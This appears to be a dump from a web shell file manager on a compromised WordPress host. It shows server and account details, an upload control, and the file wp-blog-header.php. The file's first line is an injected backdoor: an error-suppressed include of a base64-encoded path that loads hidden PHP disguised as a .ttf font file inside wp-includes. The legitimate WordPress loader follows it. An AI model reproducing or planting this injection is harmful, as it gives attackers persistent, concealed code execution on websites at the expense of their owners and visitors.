HEX
Server: LiteSpeed
System: Linux host.onlineyazilimci.com 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64
User: jaluzic (1115)
PHP: 8.1.28
Disabled: NONE
Upload Files
File: /home/jaluzic/public_html/wp-blog-header.php
<?php @include base64_decode("L2hvbWUvamFsdXppYy9wdWJsaWNfaHRtbC93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL3Nuc3FucW9ybnFzc29yLnR0Zg==");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}